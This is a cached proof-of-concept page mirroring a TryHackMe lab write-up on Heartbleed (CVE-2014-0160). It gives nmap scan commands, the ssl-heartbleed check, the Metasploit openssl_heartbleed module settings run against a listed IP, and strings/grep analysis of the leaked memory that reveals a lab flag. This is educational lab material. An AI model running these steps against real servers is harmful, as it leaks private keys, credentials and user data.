CVE-2014-0160 PoC — OpenSSL 缓冲区错误漏洞

Source

https://github.com/ArtemCyberLab/Project-Field-Analysis-and-Memory-Leak-Demonstration

Associated Vulnerability

Title:OpenSSL 缓冲区错误漏洞 (CVE-2014-0160)
Description:OpenSSL是OpenSSL团队开发的一个开源的能够实现安全套接层（SSL v2/v3）和安全传输层（TLS v1）协议的通用加密库，它支持多种加密算法，包括对称密码、哈希算法、安全散列算法等。 OpenSSL的TLS和DTLS实现过程中的d1_both.c和t1_lib.c文件中存在安全漏洞，该漏洞源于当处理Heartbeat Extension数据包时，缺少边界检查。远程攻击者可借助特制的数据包利用该漏洞读取服务器内存中的敏感信息(如用户名、密码、Cookie、私钥等)。以下版本的OpenSSL受到

Description

The objective of this project was to assess a remote host for the Heartbleed vulnerability (CVE-2014-0160), verify its presence, and exploit it to extract potentially sensitive information from server memory over the TLS protocol.

Readme

Objective
The objective of this project was to assess a remote host for the Heartbleed vulnerability (CVE-2014-0160), verify its presence, and exploit it to extract potentially sensitive information from server memory over the TLS protocol.

Execution
1. Identifying Open Services (Nmap)
nmap -sC -sV 52.215.184.158
Result:

plaintext
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.4
111/tcp open  rpcbind  2-4
443/tcp open  ssl/http nginx 1.15.7

| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK
| Not valid before: 2019-02-16T10:41:14
| Not valid after:  2020-02-16T10:41:14
The TLS certificate was self-signed and expired. This raised suspicion that the OpenSSL version could be outdated. Target port: 443.

2. Heartbleed Vulnerability Check (Nmap Script)
nmap -p 443 --script ssl-heartbleed 52.215.184.158
Result:

plaintext
| ssl-heartbleed:
|   VULNERABLE:
|     OpenSSL 1.0.1 is vulnerable to Heartbleed
|     State: VULNERABLE
|     Risk factor: High
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
The target is confirmed vulnerable to Heartbleed.

3. Exploitation (Metasploit Framework)
msfconsole
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS 52.215.184.158
run
Result:

plaintext
[+] Heartbeat response with leak, 44883 bytes
[+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin
Memory successfully dumped and stored locally for analysis.

4. Analyzing Memory Dump

strings openssl.heartble_152689.bin | grep -i "THM{"
Result:

plaintext
user_name=hacker101&user_email=haxor@haxor.com&user_message=THM{sSl-Is-BaD}
Confidential data, including an application flag, was successfully extracted from TLS memory — confirming the vulnerability can be practically exploited to leak sensitive information.

Conclusion
I successfully identified and exploited CVE-2014-0160 on a remote server. The process included:

Detecting the vulnerability with nmap

Exploiting the flaw using Metasploit

Extracting live user-submitted data (including the flag THM{sSl-Is-BaD}) from memory

Business Impact
The presence of Heartbleed in a publicly exposed system poses a critical risk:

Potential leakage of TLS private keys

Session hijacking

Exposure of usernames, emails, and sensitive user input

File Snapshot


 [4.0K]  /data/pocs/4c814bbf139104d1bbf4cb337fa6ee7db343a9cf
├── [163K]  1.jpeg
├── [181K]  2.jpeg
├── [128K]  3.jpeg
├── [207K]  4.jpeg
├── [302K]  5.jpeg
└── [2.3K]  README.md

0 directories, 6 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!